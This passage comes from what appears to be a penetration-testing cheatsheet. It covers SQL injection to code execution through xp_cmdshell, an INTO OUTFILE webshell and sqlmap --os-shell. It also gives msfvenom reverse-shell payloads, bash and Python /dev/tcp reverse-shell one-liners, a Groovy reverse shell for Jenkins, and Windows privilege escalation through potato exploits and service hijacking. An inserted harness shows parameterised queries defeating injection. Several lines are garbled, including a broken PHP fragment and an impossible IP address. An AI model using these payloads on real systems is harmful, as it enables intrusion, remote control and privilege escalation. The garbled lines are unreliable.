EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
#Now we can run commands
EXECUTE xp_cmdshell 'whoami';

#Sometimes we may not have direct access to convert it to RCE from the web, then follow the steps below
' UNION SELECT "", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- // #Writing into a new file
#Now we can exploit it
http://192.168.45.285/tmp/webshell.php?cmd=id #Command execution
```

- SQLMap - Automated Code execution

```bash
sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user #Testing the parameter named "user", we'll get confirmation
sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user --dump #Dumping the database

#OS Shell
# Obtain the POST request from Burp suite and save it to post.txt
sqlmap -r post.txt -p item --os-shell --web-root "/var/www/html/tmp" #/var/www/html/tmp is the writable folder on the target, hence we write there

```
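Added example, not from the cheatsheet: a minimal sqlite3 harness showing why the `' or '1'='1` payloads listed above succeed against a string-built login query and fail against the parameterised form, including the operator-precedence detail that decides which field the payload must land in. The `users` table and both login functions are constructed for this demonstration.

```python
import sqlite3


def build_db():
    """Constructed two-user application database, kept in memory."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (id, username, password) VALUES (?, ?, ?)",
                     [(1, "admin", "S3cr3t!"), (2, "bob", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """String-concatenated query, the pattern the payload list above targets.
    Returns the username of the first matching row, or None."""
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND password = '" + password + "' ORDER BY id")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same lookup with bound parameters: the quote inside the payload is data,
    never SQL, so the WHERE clause cannot be rewritten."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ? ORDER BY id",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def demo():
    """Run the cheatsheet payloads against both functions; returns the outcomes."""
    conn = build_db()
    results = {
        # username='admin' OR ('1'='1' AND password='x'): AND binds tighter
        # than OR, so the admin row matches on the username test alone.
        "vuln_user_payload": login_vulnerable(conn, "admin' or '1'='1", "x"),
        # (username='nobody' AND password='') OR '1'='1': the trailing OR is
        # always true, so the first row by id (admin) comes back.
        "vuln_pass_payload": login_vulnerable(conn, "nobody", "' or '1'='1"),
        # username='' OR ('1'='1' AND password='x'): neither side is true,
        # so a bare ' or '1'='1 in the username field does not bypass this query.
        "vuln_user_only": login_vulnerable(conn, "' or '1'='1", "x"),
        # username='admin' -- ' AND ...: the comment removes the password check.
        "vuln_comment_payload": login_vulnerable(conn, "admin' -- ", "x"),
        "safe_user_payload": login_safe(conn, "admin' or '1'='1", "x"),
        "safe_pass_payload": login_safe(conn, "nobody", "' or '1'='1"),
        "safe_legit": login_safe(conn, "bob", "hunter2"),
    }
    conn.close()
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:20s} -> {outcome!r}")
```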
---

# Exploitation

## Reverse Shells

### Msfvenom

```bash
msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f exe > shell-x64.exe

msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f asp > shell.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
msfvenom -p php/reverse_php LHOST= LPORT= -f raw > shell.php
```

### One Liners

```bash
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
& /dev/tcp/10.11.0.106/443 0>&1');?>
#For powershell use the encrypted tool that's in the Tools folder
```

### Groovy reverse-shell

- For Jenkins

```groovy
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```

---

# Windows Privilege Escalation

## Basic

```powershell
#Starting, restarting and stopping services in Powershell
Start-Service
Stop-Service
Restart-Service

#Powershell History
type C:\Users\sathvik\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

```

## Automated Scripts

```bash
winpeas.exe
winpeas.bat
Jaws-enum.ps1
powerup.ps1
PrivescCheck.ps1
```

## Token Impersonation

- Check the current privileges with `whoami /priv`

```bash
#Printspoofer
PrintSpoofer.exe -i -c powershell.exe
PrintSpoofer.exe -c "nc.exe -e cmd"

#RoguePotato
RoguePotato.exe -r -e "shell.exe" -l 9999

#GodPotato
GodPotato.exe -cmd "cmd /c whoami"
GodPotato.exe -cmd "shell.exe"

#JuicyPotatoNG
JuicyPotatoNG.exe -t * -p "shell.exe" -a

#SharpEfsPotato
SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
#writes the output of whoami to the w.log file
```

## Services

### Binary Hijacking

```bash
#Identify the service from winpeas
icacls "path" #F means full permission, check that we have full access on the folder
sc qc #find the BINARY_PATH_NAME value
sc config